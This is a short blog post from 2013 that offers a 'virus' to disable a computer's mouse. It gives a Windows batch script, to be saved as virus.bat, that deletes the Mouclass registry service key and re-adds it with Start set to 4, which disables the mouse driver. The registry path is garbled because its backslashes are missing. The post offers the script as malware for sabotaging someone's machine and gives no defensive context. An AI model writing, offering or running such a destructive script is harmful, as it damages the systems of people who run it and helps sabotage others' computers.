Monday, September 30, 2013

latest Computer a virus that disable Mouse

Open Notepad and copy
below codes
rem ———————————
rem Disable Mouse
set
key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem ———————————
Save this file as virus.bat

No comments:

Post a Comment